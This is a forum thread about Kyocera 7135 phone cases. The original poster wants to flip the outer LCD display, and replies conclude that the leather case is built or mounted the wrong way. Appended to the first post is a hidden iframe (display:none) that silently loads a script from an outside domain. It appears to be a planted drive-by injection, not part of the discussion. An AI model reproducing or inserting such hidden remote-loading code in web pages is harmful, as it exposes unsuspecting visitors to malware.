+ Reply to Thread
    wwk

Inverting LCD Screen

Anyone know of a way to invert the LCD screen readout so that when you use the leather case (which orients the phone out, rather than in, like the plastic holster) you can read the display right side up?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Inverting LCD Screen

Originally posted by wwk
    Anyone know of a way to invert the LCD screen readout so that when you use the leather case (which orients the phone out, rather than in, like the plastic holster) you can read the display right side up?
    Say what? all of the Kyocera made holders (holster, case, and pouch) orient the top display properly.

* posted from my 7135
    Please visit my picture site: Robert-O-Rama :)

wwk
    With holster, display is readable, as top of clamshell is against your hip. With leather case, top half of clamshell faces out, making the LCD on top of the unit less readable to you (more readable to someone standing next to you). See what I mean?

Originally posted by wwk
    With holster, display is readable, as top of clamshell is against your hip. With leather case, top half of clamshell faces out, making the LCD on top of the unit less readable to you (more readable to someone standing next to you). See what I mean?
    It's true that the leather case (and pouch) do not hold as snugly to the hip as the holster, but I've used the leather case every day for almost 2 months and never thought that it was hard to see the top display.

How would inverting the display help?

WWK

No it doesn't!!!!!!!!!!!!!!!!!!!!

Either your case was built upside down or you have the phone in the case backwards.

On my case and in all of the pictures I have seen of the case, the knob that attaches to the clip is on the top of the phone (the clamshell that has the metallic Kyocera logo on it. When the case is attached to the clip, the top half of the clamshell is against your body. When you look straight down at it you should be able to read the screen. It will be upside down for someone standing next to you.

I hope this helps. Please forgive me if this sounds sarcastic or condescending. It isn't intended that way.
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

wwk
    Well, call me crazy... but the knob on my case (purchased from Verizon, which might be the problem) is on the backside, which inverts the display for me. Maybe I'll send it back, since mine doesn't have a pocket for the SD card either.

Originally posted by wwk
    Well, call me crazy... but the knob on my case (purchased from Verizon, which might be the problem) is on the backside, which inverts the display for me. Maybe I'll send it back, since mine doesn't have a pocket for the SD card either.
    Are you sure it was intended for the 7135? Did you get it online, or in a store?

That sounds like your problem. There should be a stretchy little pocket on the inside of the case behind that outside knob (not trying to make this confusing) to hold the sd card. I recommend you get the case from Dan's celphones. You will find a thread under "classifieds" on this site, that has his price list and contact info. Scroll about half way down on the opening classifieds directory. His prices and service can't be beat!!!!

No, I don't work for Dan, blah, blah, blah............

Hope this helps!
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

wwk
    Absolutely intended for the 7135... it fits very well, well constructed, with a little Verizon logo and was ordered online through Verizon... only problem is what I've mentioned.